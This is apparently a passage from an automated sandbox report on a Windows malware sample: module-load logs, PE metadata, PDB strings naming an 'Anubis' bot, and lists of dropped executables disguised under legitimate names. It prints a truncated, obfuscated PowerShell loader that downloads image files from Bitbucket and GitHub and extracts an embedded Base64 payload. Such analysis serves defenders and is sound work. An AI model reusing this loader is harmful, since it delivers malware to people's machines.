                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                  Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 3lhrJ4X.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3lhrJ4X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: 3lhrJ4X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wextract.pdb source: 3lhrJ4X.exe
                  Source: Binary string: wextract.pdbGCTL source: 3lhrJ4X.exe
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.dr
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.6\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp
                  Source: 3lhrJ4X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 3lhrJ4X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 3lhrJ4X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 3lhrJ4X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 3lhrJ4X.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$G